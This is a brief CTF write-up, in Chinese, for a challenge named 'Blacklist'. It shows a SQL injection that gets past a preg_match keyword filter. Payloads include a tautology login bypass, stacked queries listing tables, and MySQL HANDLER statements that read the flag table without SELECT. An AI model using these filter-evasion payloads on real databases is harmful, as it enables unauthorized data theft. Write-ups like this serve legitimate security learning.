C
C
CTF-WriteUp
Search
⌃K

Blacklist

万能钥匙穿了
1' or '1'='1'#
上select被过滤了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
感觉很像强网杯的随便注(看了一下就是),然后就是堆叠注入了。
1';show tables;#
​官方文档。使用OPEN打开表的会话,在CLOSE前不会关闭;使其在打开期间使用READ读取文件。
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
#